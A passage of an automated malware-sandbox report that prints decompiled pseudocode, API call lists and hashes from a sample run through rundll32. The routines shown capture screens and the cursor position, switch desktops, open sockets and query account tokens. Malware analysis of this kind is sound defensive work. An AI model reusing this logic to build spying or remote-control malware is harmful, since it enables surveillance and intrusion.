                                                            				void* __edi;
                                                            				intOrPtr _t59;
                                                            				signed int _t66;
                                                            				signed int _t67;
                                                            				struct HWND__* _t77;
                                                            				int* _t79;
                                                            				void* _t90;
                                                            				void* _t91;
                                                            				signed int _t92;
                                                            				void* _t93;
                                                            				signed int _t94;
                                                            
                                                            				_t91 = __esi;
                                                            				_t79 = _a4;
                                                            				_t90 = __ecx;
                                                            				if(_t79 == 0 ||  *((intOrPtr*)(__ecx + 0x14)) == 0) {
                                                            					__eflags = 0;
                                                            					return 0;
                                                            				} else {
                                                            					if(E04645570(_t79, __ecx, __esi) != 0) {
                                                            						ReleaseDC( *(_t90 + 0x104),  *(_t90 + 0x3c));
                                                            						_t77 = GetDesktopWindow();
                                                            						 *(_t90 + 0x104) = _t77;
                                                            						 *(_t90 + 0x3c) = GetDC(_t77);
                                                            					}
                                                            					 *(_t90 + 0x18) = 0;
                                                            					 *((char*)( *((intOrPtr*)(_t90 + 0x14)))) =  *((intOrPtr*)(_t90 + 4));
                                                            					 *(_t90 + 0x18) =  *(_t90 + 0x18) + 1;
                                                            					GetCursorPos( &_v12);
                                                            					asm("movq xmm0, [ebp-0x8]");
                                                            					asm("movq [eax], xmm0");
                                                            					 *(_t90 + 0x18) =  *(_t90 + 0x18) + 8;
                                                            					 *((char*)( *((intOrPtr*)(_t90 + 0x14)) +  *(_t90 + 0x18))) = E04642370(_t90 + 0x80);
                                                            					 *(_t90 + 0x18) =  *(_t90 + 0x18) + 1;
                                                            					if( *((char*)(_t90 + 4)) != 2) {
                                                            						_t59 = _v12.y;
                                                            						_push(_t91);
                                                            						_t92 = _t59 - 0x13;
                                                            						__eflags = _t92;
                                                            						_t93 =  <  ? 0 : _t92;
                                                            						__eflags = _t59 -  *0x4687b1c; // 0x0
                                                            						if(__eflags == 0) {
                                                            							L9:
                                                            							_t94 =  *(_t90 + 0x28);
                                                            						} else {
                                                            							_t67 = L04642B10(_t90, _t93);
                                                            							__eflags = _t67;
                                                            							if(_t67 == 0) {
                                                            								goto L9;
                                                            							} else {
                                                            								_t94 = _t93 + 0x13;
                                                            							}
                                                            						}
                                                            						__eflags = _t94 -  *((intOrPtr*)(_t90 + 0x24));
                                                            						while(_t94 <  *((intOrPtr*)(_t90 + 0x24))) {
                                                            							_t66 = L04642B10(_t90, _t94);
                                                            							__eflags = _t66;
                                                            							if(_t66 != 0) {
                                                            								_t94 = _t94 + 0x13;
                                                            								__eflags = _t94;
                                                            							}
                                                            							_t94 = _t94 + 0x13;
                                                            							__eflags = _t94 -  *((intOrPtr*)(_t90 + 0x24));
                                                            						}
                                                            						 *0x4687b1c = _v12.y;
                                                            						asm("cdq");
                                                            						_t45 = ( *(_t90 + 0x28) + 3) % 0x13;
                                                            						__eflags = _t45;
                                                            						 *_t79 =  *(_t90 + 0x18);
                                                            						 *(_t90 + 0x28) = _t45;
                                                            						return  *((intOrPtr*)(_t90 + 0x14));
                                                            					} else {
                                                            						BitBlt( *(_t90 + 0x78), 0, 0,  *( *((intOrPtr*)(_t90 + 0x60)) + 4),  *( *((intOrPtr*)(_t90 + 0x60)) + 8),  *(_t90 + 0x3c), 0, 0,  *(_t90 + 0x10));
                                                            						 *_t79 = E04636F00( *((intOrPtr*)(_t90 + 0x70)),  *((intOrPtr*)(_t90 + 0x58)),  *((intOrPtr*)(_t90 + 0x14)) +  *(_t90 + 0x18),  *((intOrPtr*)( *((intOrPtr*)(_t90 + 0x60)) + 0x14))) +  *(_t90 + 0x18);
                                                            						return  *((intOrPtr*)(_t90 + 0x14));
                                                            					}
                                                            				}
                                                            			}
















                                                            0x04642760
                                                            0x04642767
                                                            0x0464276b
                                                            0x0464276f
                                                            0x046428b2
                                                            0x046428b8
                                                            0x0464277f
                                                            0x04642786
                                                            0x04642791
                                                            0x04642797
                                                            0x0464279e
                                                            0x046427aa
                                                            0x046427aa
                                                            0x046427b0
                                                            0x046427ba
                                                            0x046427bf
                                                            0x046427c3
                                                            0x046427d5
                                                            0x046427da
                                                            0x046427de
                                                            0x046427ed
                                                            0x046427ef
                                                            0x046427f6
                                                            0x04642840
                                                            0x04642845
                                                            0x04642846
                                                            0x04642849
                                                            0x0464284b
                                                            0x0464284e
                                                            0x04642854
                                                            0x04642867
                                                            0x04642867
                                                            0x04642856
                                                            0x04642859
                                                            0x0464285e
                                                            0x04642860
                                                            0x00000000
                                                            0x04642862
                                                            0x04642862
                                                            0x04642862
                                                            0x04642860
                                                            0x0464286a
                                                            0x0464286d
                                                            0x04642873
                                                            0x04642878
                                                            0x0464287a
                                                            0x0464287c
                                                            0x0464287c
                                                            0x0464287c
                                                            0x0464287f
                                                            0x04642882
                                                            0x04642882
                                                            0x0464288f
                                                            0x0464289a
                                                            0x0464289b
                                                            0x0464289b
                                                            0x046428a0
                                                            0x046428a6
                                                            0x046428ae
                                                            0x046427f8
                                                            0x04642812
                                                            0x04642833
                                                            0x0464283d
                                                            0x0464283d
                                                            0x046427f6

                                                            APIs
                                                              • Part of subcall function 04645570: GetCurrentThreadId.KERNEL32 ref: 04645588
                                                              • Part of subcall function 04645570: GetThreadDesktop.USER32(00000000), ref: 0464558F
                                                              • Part of subcall function 04645570: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 046455CF
                                                              • Part of subcall function 04645570: OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 046455DA
                                                              • Part of subcall function 04645570: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 0464560E
                                                              • Part of subcall function 04645570: lstrcmpi.KERNEL32(?,?), ref: 0464561E
                                                              • Part of subcall function 04645570: SetThreadDesktop.USER32(00000000), ref: 04645629
                                                              • Part of subcall function 04645570: CloseDesktop.USER32(?), ref: 0464563D
                                                              • Part of subcall function 04645570: CloseDesktop.USER32(00000000), ref: 04645640
                                                            • ReleaseDC.USER32(?,?), ref: 04642791
                                                            • GetDesktopWindow.USER32 ref: 04642797
                                                            • GetDC.USER32(00000000), ref: 046427A4
                                                              • Part of subcall function 04642B10: BitBlt.GDI32(00000000,00000000,00000000,?,00000001,?,00000000,00000000,?), ref: 04642B37
                                                              • Part of subcall function 04642B10: SetRect.USER32(?,000000FF,-00000013,000000FF,00000026), ref: 04642B60
                                                            • GetCursorPos.USER32(?), ref: 046427C3
                                                            • BitBlt.GDI32(?,00000000,00000000,00000002,?,?,00000000,00000000,?), ref: 04642812
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Desktop$Thread$CloseInformationObjectUser$CurrentCursorInputOpenRectReleaseWindowlstrcmpi
                                                            • String ID:
                                                            • API String ID: 1863377006-0
                                                            • Opcode ID: 725b39100e6141b370fbb704997912aed89d59e0ad582e9356724d0aa7cc92bd
                                                            • Instruction ID: 9aae1f27b406825531efd28640e29cd312bd5cc0f8ab06e5331b12f49ee88735
                                                            • Opcode Fuzzy Hash: 725b39100e6141b370fbb704997912aed89d59e0ad582e9356724d0aa7cc92bd
                                                            • Instruction Fuzzy Hash: 10417D72A00A02BFCB15DF69D894B64B7B1FF98314F140299E90497A11E731F8B5DBE4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 0464D020: StrChrW.SHLWAPI(?,0000003A), ref: 0464D044
                                                            • WSASetLastError.WS2_32(0000273F,?,?), ref: 0464DAB6
                                                              • Part of subcall function 0464D0D0: WSASetLastError.WS2_32(00002741), ref: 0464D0FA
                                                            • socket.WS2_32(00000000,00000002,00000011), ref: 0464DAD9
                                                            • WSAIoctl.WS2_32(00000000,9800000C,00000000,00000004,00000000,00000000,00000000,00000000,00000000), ref: 0464DB06
                                                            • WSAGetLastError.WS2_32 ref: 0464DB11
                                                            • WSACreateEvent.WS2_32 ref: 0464DB31
                                                              • Part of subcall function 04637AC0: RaiseException.KERNEL32(C000001D,00000001,00000000,00000000,?,046383DB,80004005,?,046387F8,04638B6E,00000000,?), ref: 04637ADE
                                                              • Part of subcall function 04637AC0: RtlEnterCriticalSection.NTDLL(?), ref: 0464FA53
                                                              • Part of subcall function 04637AC0: RtlLeaveCriticalSection.NTDLL(?), ref: 0464FA7B
                                                              • Part of subcall function 04637AC0: SetLastError.KERNEL32(0000139F,?,046383DB,80004005,?,046387F8,04638B6E,00000000,?), ref: 0464FA87
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$CriticalSection$CreateEnterEventExceptionIoctlLeaveRaisesocket
                                                            • String ID:
                                                            • API String ID: 688454317-0
                                                            • Opcode ID: d14edf72a1149ade1258fdfa6b1f525e8bc7fed32cd79d37db2d5a76007bb811
                                                            • Instruction ID: 895a9af0ed5b4a23b514107c752702b9c0c16aa53e759d634f4b41d6f099b807
                                                            • Opcode Fuzzy Hash: d14edf72a1149ade1258fdfa6b1f525e8bc7fed32cd79d37db2d5a76007bb811
                                                            • Instruction Fuzzy Hash: 55318F75E00209ABEF14EF64E888BAA73A5EF98314F10416EED16D72D0FB70B941CB55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 30%
                                                            			E04638240(intOrPtr* __ebx, intOrPtr* __ecx, void* __edi, intOrPtr _a4, signed char _a8) {
                                                            				void* _t54;
                                                            				void* _t60;
                                                            				intOrPtr _t61;
                                                            				intOrPtr _t62;
                                                            				void* _t67;
                                                            				void* _t84;
                                                            				void* _t85;
                                                            				void* _t86;
                                                            				intOrPtr* _t89;
                                                            				struct _SECURITY_ATTRIBUTES** _t91;
                                                            				void* _t93;
                                                            				intOrPtr* _t94;
                                                            				intOrPtr* _t98;
                                                            				intOrPtr* _t99;
                                                            				intOrPtr* _t101;
                                                            				void* _t105;
                                                            				void* _t109;
                                                            
                                                            				_t89 = __ecx;
                                                            				_t88 = __ebx;
                                                            				_t105 = _t109;
                                                            				_t93 = CreateEventW;
                                                            				_t98 = __ecx;
                                                            				 *__ecx = 0x467e1b0;
                                                            				_t54 = CreateEventW(0, 1, 1, 0);
                                                            				 *(_t98 + 4) = _t54;
                                                            				if(_t54 == 0) {
                                                            					_push(0x80004005);
                                                            					E04637AC0();
                                                            					goto L7;
                                                            				} else {
                                                            					_t3 = _t98 + 0x5c; // 0x60
                                                            					_t91 = _t3;
                                                            					 *((intOrPtr*)(_t98 + 8)) = _a4;
                                                            					 *(_t98 + 0xc) = 1;
                                                            					 *((intOrPtr*)(_t98 + 0x10)) = 5;
                                                            					 *(_t98 + 0x14) = 0;
                                                            					 *(_t98 + 0x18) = 1;
                                                            					 *((intOrPtr*)(_t98 + 0x1c)) = 0xffffffff;
                                                            					 *(_t98 + 0x20) = 0;
                                                            					 *(_t98 + 0x24) = 0;
                                                            					 *(_t98 + 0x28) = 1;
                                                            					 *((intOrPtr*)(_t98 + 0x2c)) = 0x598;
                                                            					 *((intOrPtr*)(_t98 + 0x30)) = 0x3c;
                                                            					 *((intOrPtr*)(_t98 + 0x34)) = 0x3c;
                                                            					 *((intOrPtr*)(_t98 + 0x38)) = 3;
                                                            					 *((intOrPtr*)(_t98 + 0x3c)) = 0xea60;
                                                            					 *(_t98 + 0x40) = 0;
                                                            					 *(_t98 + 0x44) = 0;
                                                            					 *(_t98 + 0x48) = 0;
                                                            					 *(_t98 + 0x4c) = 0;
                                                            					 *((intOrPtr*)(_t98 + 0x50)) = 3;
                                                            					 *(_t98 + 0x54) = 0;
                                                            					 *(_t98 + 0x58) = 0;
                                                            					 *_t91 = 0;
                                                            					_t91[1] = 0;
                                                            					_t91[2] = 0;
                                                            					E0463ADA0(_t91, 0, _t91, 0);
                                                            					_t109 = _t109 - 0xc;
                                                            					_t27 = _t98 + 0x68; // 0x6c
                                                            					_t88 = _t27;
                                                            					_t89 = _t88;
                                                            					L0463ABB0(_t89, CreateEventW, __ebx);
                                                            					_t28 = _t98 + 0x14c; // 0x150
                                                            					 *(_t98 + 0x148) = 0;
                                                            					if(InitializeCriticalSectionAndSpinCount(_t28, 0) == 0) {
                                                            						L7:
                                                            						_push(0x80004005);
                                                            						E04637AC0();
                                                            						goto L8;
                                                            					} else {
                                                            						 *(_t98 + 0x168) = 0;
                                                            						 *(_t98 + 0x16c) = 0;
                                                            						 *(_t98 + 0x164) = 0;
                                                            						 *((intOrPtr*)(_t98 + 0x170)) = _t88;
                                                            						_t84 = CreateEventW(0, 0, 0, 0);
                                                            						 *(_t98 + 0x174) = _t84;
                                                            						_pop(_t88);
                                                            						if(_t84 == 0) {
                                                            							L8:
                                                            							_push(0x80004005);
                                                            							E04637AC0();
                                                            							goto L9;
                                                            						} else {
                                                            							_t85 = CreateEventW(0, 0, 0, 0);
                                                            							 *(_t98 + 0x178) = _t85;
                                                            							if(_t85 == 0) {
                                                            								L9:
                                                            								_push(0x80004005);
                                                            								E04637AC0();
                                                            								goto L10;
                                                            							} else {
                                                            								_t86 = CreateEventW(0, 0, 0, 0);
                                                            								 *(_t98 + 0x17c) = _t86;
                                                            								if(_t86 == 0) {
                                                            									L10:
                                                            									_push(0x80004005);
                                                            									E04637AC0();
                                                            									asm("int3");
                                                            									asm("int3");
                                                            									asm("int3");
                                                            									asm("int3");
                                                            									asm("int3");
                                                            									asm("int3");
                                                            									asm("int3");
                                                            									asm("int3");
                                                            									asm("int3");
                                                            									asm("int3");
                                                            									asm("int3");
                                                            									asm("int3");
                                                            									asm("int3");
                                                            									_push(_t98);
                                                            									_t99 = _t89;
                                                            									_push(_t93);
                                                            									 *_t99 = 0x467e1b0;
                                                            									if( *((intOrPtr*)(_t99 + 0x50)) != 3) {
                                                            										E0464E6F0(_t89);
                                                            									}
                                                            									_t60 =  *(_t99 + 0x17c);
                                                            									_t94 = CloseHandle;
                                                            									if(_t60 == 0 || CloseHandle(_t60) != 0) {
                                                            										_t61 =  *((intOrPtr*)(_t99 + 0x178));
                                                            										if(_t61 == 0) {
                                                            											L17:
                                                            											_t62 =  *((intOrPtr*)(_t99 + 0x174));
                                                            											if(_t62 == 0) {
                                                            												L19:
                                                            												E0463AC60(_t99 + 0x164);
                                                            												DeleteCriticalSection(_t99 + 0x14c);
                                                            												_t89 = _t99 + 0x68;
                                                            												E0463AB40(_t88, _t89);
                                                            												_t66 =  *(_t99 + 0x5c);
                                                            												if( *(_t99 + 0x5c) != 0) {
                                                            													L0465ED17(_t66);
                                                            													_t109 = _t109 + 4;
                                                            													 *(_t99 + 0x5c) = 0;
                                                            													 *(_t99 + 0x60) = 0;
                                                            													 *(_t99 + 0x64) = 0;
                                                            												}
                                                            												_t67 =  *(_t99 + 4);
                                                            												if(_t67 == 0) {
                                                            													L23:
                                                            													 *_t99 = 0x467dfa4;
                                                            													return _t67;
                                                            												} else {
                                                            													_t67 = CloseHandle(_t67);
                                                            													if(_t67 == 0) {
                                                            														goto L27;
                                                            													} else {
                                                            														goto L23;
                                                            													}
                                                            												}
                                                            											} else {
                                                            												_push(_t62);
                                                            												if( *_t94() == 0) {
                                                            													goto L26;
                                                            												} else {
                                                            													goto L19;
                                                            												}
                                                            											}
                                                            										} else {
                                                            											_push(_t61);
                                                            											if( *_t94() == 0) {
                                                            												goto L25;
                                                            											} else {
                                                            												goto L17;
                                                            											}
                                                            										}
                                                            									} else {
                                                            										_push(0x80004005);
                                                            										E04637AC0();
                                                            										L25:
                                                            										_push(0x80004005);
                                                            										E04637AC0();
                                                            										L26:
                                                            										_push(0x80004005);
                                                            										E04637AC0();
                                                            										L27:
                                                            										_push(0x80004005);
                                                            										E04637AC0();
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										_push(_t105);
                                                            										_push(_t99);
                                                            										_t101 = _t89;
                                                            										L11();
                                                            										if((_a8 & 0x00000001) != 0) {
                                                            											_push(0x18c);
                                                            											E04655B47(_t101);
                                                            										}
                                                            										return _t101;
                                                            									}
                                                            								} else {
                                                            									 *(_t98 + 0x180) = 0;
                                                            									 *(_t98 + 0x184) = 0;
                                                            									 *(_t98 + 0x188) = 0;
                                                            									return _t98;
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            			}




















                                                            0x04638240
                                                            0x04638240
                                                            0x04638241
                                                            0x04638245
                                                            0x0463824b
                                                            0x04638255
                                                            0x0463825b
                                                            0x0463825d
                                                            0x04638262
                                                            0x046383d1
                                                            0x046383d6
                                                            0x00000000
                                                            0x04638268
                                                            0x0463826b
                                                            0x0463826b
                                                            0x0463826e
                                                            0x04638271
                                                            0x04638278
                                                            0x0463827f
                                                            0x04638286
                                                            0x0463828e
                                                            0x04638295
                                                            0x0463829c
                                                            0x046382a3
                                                            0x046382aa
                                                            0x046382b1
                                                            0x046382b8
                                                            0x046382bf
                                                            0x046382c6
                                                            0x046382cd
                                                            0x046382d4
                                                            0x046382db
                                                            0x046382e4
                                                            0x046382eb
                                                            0x046382f2
                                                            0x046382f9
                                                            0x04638303
                                                            0x04638309
                                                            0x04638310
                                                            0x04638317
                                                            0x0463831c
                                                            0x0463831f
                                                            0x0463831f
                                                            0x04638322
                                                            0x04638324
                                                            0x0463832b
                                                            0x04638331
                                                            0x04638344
                                                            0x046383db
                                                            0x046383db
                                                            0x046383e0
                                                            0x00000000
                                                            0x0463834a
                                                            0x04638352
                                                            0x0463835c
                                                            0x04638366
                                                            0x04638370
                                                            0x04638376
                                                            0x04638378
                                                            0x0463837e
                                                            0x04638381
                                                            0x046383e5
                                                            0x046383e5
                                                            0x046383ea
                                                            0x00000000
                                                            0x04638383
                                                            0x0463838b
                                                            0x0463838d
                                                            0x04638395
                                                            0x046383ef
                                                            0x046383ef
                                                            0x046383f4
                                                            0x00000000
                                                            0x04638397
                                                            0x0463839f
                                                            0x046383a1
                                                            0x046383a9
                                                            0x046383f9
                                                            0x046383f9
                                                            0x046383fe
                                                            0x04638403
                                                            0x04638404
                                                            0x04638405
                                                            0x04638406
                                                            0x04638407
                                                            0x04638408
                                                            0x04638409
                                                            0x0463840a
                                                            0x0463840b
                                                            0x0463840c
                                                            0x0463840d
                                                            0x0463840e
                                                            0x0463840f
                                                            0x04638410
                                                            0x04638411
                                                            0x04638413
                                                            0x04638418
                                                            0x0463841e
                                                            0x04638420
                                                            0x04638420
                                                            0x04638425
                                                            0x0463842b
                                                            0x04638433
                                                            0x0463843c
                                                            0x04638444
                                                            0x0463844d
                                                            0x0463844d
                                                            0x04638455
                                                            0x0463845e
                                                            0x04638464
                                                            0x04638470
                                                            0x04638476
                                                            0x04638479
                                                            0x0463847e
                                                            0x04638483
                                                            0x04638486
                                                            0x0463848b
                                                            0x0463848e
                                                            0x04638495
                                                            0x0463849c
                                                            0x0463849c
                                                            0x046384a3
                                                            0x046384a8
                                                            0x046384b1
                                                            0x046384b2
                                                            0x046384b9
                                                            0x046384aa
                                                            0x046384ab
                                                            0x046384af
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x046384af
                                                            0x04638457
                                                            0x04638457
                                                            0x0463845c
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463845c
                                                            0x04638446
                                                            0x04638446
                                                            0x0463844b
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463844b
                                                            0x046384ba
                                                            0x046384ba
                                                            0x046384bf
                                                            0x046384c4
                                                            0x046384c4
                                                            0x046384c9
                                                            0x046384ce
                                                            0x046384ce
                                                            0x046384d3
                                                            0x046384d8
                                                            0x046384d8
                                                            0x046384dd
                                                            0x046384e2
                                                            0x046384e3
                                                            0x046384e4
                                                            0x046384e5
                                                            0x046384e6
                                                            0x046384e7
                                                            0x046384e8
                                                            0x046384e9
                                                            0x046384ea
                                                            0x046384eb
                                                            0x046384ec
                                                            0x046384ed
                                                            0x046384ee
                                                            0x046384ef
                                                            0x046384f0
                                                            0x046384f3
                                                            0x046384f4
                                                            0x046384f6
                                                            0x046384ff
                                                            0x04638501
                                                            0x04638507
                                                            0x0463850c
                                                            0x04638513
                                                            0x04638513
                                                            0x046383ab
                                                            0x046383ab
                                                            0x046383b7
                                                            0x046383c2
                                                            0x046383ce
                                                            0x046383ce
                                                            0x046383a9
                                                            0x04638395
                                                            0x04638381
                                                            0x04638344

                                                            APIs
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,?,046387F8,04638B6E,00000000,?,?,04638B6E,0467E024,?), ref: 0463825B
                                                              • Part of subcall function 0463ABB0: HeapCreate.KERNEL32(00000004,00000000,00000000,74D0F5E0,00000004,04638329,?,04638B6E,0467E024,?), ref: 0463ABD5
                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(00000150,00000000,?,04638B6E,0467E024,?), ref: 0463833C
                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,04638B6E,0467E024,?), ref: 04638376
                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,04638B6E,0467E024,?), ref: 0463838B
                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0463839F
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Create$Event$CountCriticalHeapInitializeSectionSpin
                                                            • String ID:
                                                            • API String ID: 1949328396-0
                                                            • Opcode ID: f7223a07ee404dc593219f9cfb6d1dec3ed7b56f4eb079a8222ebaecc6b1e6b8
                                                            • Instruction ID: f7c7040bbbefd9e8af2b3b1f8d9b589a33b86079a57e9217eeede44504d638a3
                                                            • Opcode Fuzzy Hash: f7223a07ee404dc593219f9cfb6d1dec3ed7b56f4eb079a8222ebaecc6b1e6b8
                                                            • Instruction Fuzzy Hash: A141CCB0140B45ABF3309F65CC59B87BAE4EF00719F10491DE69AAA6D0D7F6B148CF98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 86%
                                                            			E04644440(void* __ecx, void* __edx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				short _v520;
                                                            				short _v1032;
                                                            				long _v1036;
                                                            				void* _v1040;
                                                            				long _v1044;
                                                            				long _v1048;
                                                            				union _SID_NAME_USE _v1052;
                                                            				signed int _t27;
                                                            				signed int _t51;
                                                            				signed short* _t59;
                                                            				void* _t64;
                                                            				void* _t65;
                                                            				void* _t67;
                                                            				void* _t68;
                                                            				signed int _t69;
                                                            
                                                            				_t56 = __ecx;
                                                            				_t27 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t27 ^ _t69;
                                                            				_t64 = __edx;
                                                            				_t67 = __ecx;
                                                            				E0465DEA0(__edx, __edx, 0, 0x208);
                                                            				_v1040 = 0;
                                                            				_v1036 = 0;
                                                            				E0465DEA0(_t64,  &_v520, 0, 0x200);
                                                            				E0465DEA0(_t64,  &_v1032, 0, 0x200);
                                                            				_v1044 = 0x100;
                                                            				_v1048 = 0x100;
                                                            				if(OpenProcessToken(_t67, 8,  &_v1040) == 0 || GetTokenInformation(_v1040, 1, 0, _v1036,  &_v1036) == 0 && GetLastError() != 0x7a) {
                                                            					L10:
                                                            					return E04655AFE(_v8 ^ _t69);
                                                            				} else {
                                                            					_push(_v1036);
                                                            					_t68 = E0465EF79(_t56);
                                                            					if(_t68 == 0) {
                                                            						goto L10;
                                                            					} else {
                                                            						if(GetTokenInformation(_v1040, 1, _t68, _v1036,  &_v1036) == 0 || LookupAccountSidW(0,  *_t68,  &_v520,  &_v1048,  &_v1032,  &_v1044,  &_v1052) == 0) {
                                                            							L0465ED17(_t68);
                                                            							goto L10;
                                                            						} else {
                                                            							_t59 =  &_v520;
                                                            							_t65 = _t64 - _t59;
                                                            							do {
                                                            								_t51 =  *_t59 & 0x0000ffff;
                                                            								_t59 =  &(_t59[1]);
                                                            								 *(_t65 + _t59 - 2) = _t51;
                                                            							} while (_t51 != 0);
                                                            							L0465ED17(_t68);
                                                            							return E04655AFE(_v8 ^ _t69);
                                                            						}
                                                            					}
                                                            				}
                                                            			}



















                                                            0x04644440
                                                            0x04644449
                                                            0x04644450
                                                            0x0464445a
                                                            0x0464445c
                                                            0x04644461
                                                            0x04644471
                                                            0x0464447e
                                                            0x04644488
                                                            0x0464449b
                                                            0x046444a3
                                                            0x046444b3
                                                            0x046444c9
                                                            0x046445a6
                                                            0x046445b7
                                                            0x046444ff
                                                            0x046444ff
                                                            0x0464450a
                                                            0x04644511
                                                            0x00000000
                                                            0x04644517
                                                            0x04644535
                                                            0x0464459e
                                                            0x00000000
                                                            0x04644568
                                                            0x04644568
                                                            0x04644570
                                                            0x04644572
                                                            0x04644572
                                                            0x04644575
                                                            0x04644578
                                                            0x0464457d
                                                            0x04644583
                                                            0x0464459c
                                                            0x0464459c
                                                            0x04644535
                                                            0x04644511

                                                            APIs
                                                            • OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,?,?,?,?,?,00000001,74CB69A0), ref: 046444C1
                                                            • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,?,?,?,?,?,?,00000001,74CB69A0), ref: 046444E6
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000001,74CB69A0), ref: 046444F0
                                                            • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000001,74CB69A0), ref: 0464452D
                                                            • LookupAccountSidW.ADVAPI32(00000000,00000000,?,00000100,?,00000100,?), ref: 0464455E
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Token$Information$AccountErrorLastLookupOpenProcess
                                                            • String ID:
                                                            • API String ID: 2790146286-0
                                                            • Opcode ID: ef2b58a3246a13bfa50f2d02e9c765d07ab259d648c9744965906c026398f295
                                                            • Instruction ID: 058f203e987996c2e053e82cda4c68e25fdaae3a3fed477c49b93f72d9c3f1bc
                                                            • Opcode Fuzzy Hash: ef2b58a3246a13bfa50f2d02e9c765d07ab259d648c9744965906c026398f295
                                                            • Instruction Fuzzy Hash: B24180B1900118AAEF25DB50DC45FEA77B8EF44304F4041A9EB09A6190FF75AE858B68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 33%
                                                            			E04637F60(intOrPtr* __ebx, intOrPtr* __ecx, void* __edi, intOrPtr _a4, signed char _a8) {
                                                            				void* _t53;
                                                            				void* _t59;
                                                            				intOrPtr _t60;
                                                            				intOrPtr _t61;
                                                            				void* _t66;
                                                            				void* _t83;
                                                            				void* _t84;
                                                            				void* _t85;
                                                            				intOrPtr* _t88;
                                                            				struct _SECURITY_ATTRIBUTES** _t90;
                                                            				void* _t92;
                                                            				intOrPtr* _t93;
                                                            				intOrPtr* _t97;
                                                            				intOrPtr* _t98;
                                                            				intOrPtr* _t100;
                                                            				void* _t104;
                                                            				void* _t108;
                                                            
                                                            				_t88 = __ecx;
                                                            				_t87 = __ebx;
                                                            				_t104 = _t108;
                                                            				_t92 = CreateEventW;
                                                            				_t97 = __ecx;
                                                            				 *__ecx = 0x467e280;
                                                            				_t53 = CreateEventW(0, 1, 1, 0);
                                                            				 *(_t97 + 4) = _t53;
                                                            				if(_t53 == 0) {
                                                            					_push(0x80004005);
                                                            					E04637AC0();
                                                            					goto L7;
                                                            				} else {
                                                            					_t3 = _t97 + 0x5c; // 0x5c
                                                            					_t90 = _t3;
                                                            					 *((intOrPtr*)(_t97 + 8)) = _a4;
                                                            					 *(_t97 + 0xc) = 1;
                                                            					 *((intOrPtr*)(_t97 + 0x10)) = 5;
                                                            					 *(_t97 + 0x14) = 0;
                                                            					 *(_t97 + 0x18) = 1;
                                                            					 *((intOrPtr*)(_t97 + 0x1c)) = 0xffffffff;
                                                            					 *(_t97 + 0x20) = 0;
                                                            					 *(_t97 + 0x24) = 0;
                                                            					 *(_t97 + 0x28) = 1;
                                                            					 *((intOrPtr*)(_t97 + 0x2c)) = 0x1000;
                                                            					 *((intOrPtr*)(_t97 + 0x30)) = 0x3c;
                                                            					 *((intOrPtr*)(_t97 + 0x34)) = 0x3c;
                                                            					 *((intOrPtr*)(_t97 + 0x38)) = 0xea60;
                                                            					 *((intOrPtr*)(_t97 + 0x3c)) = 0x4e20;
                                                            					 *(_t97 + 0x40) = 0;
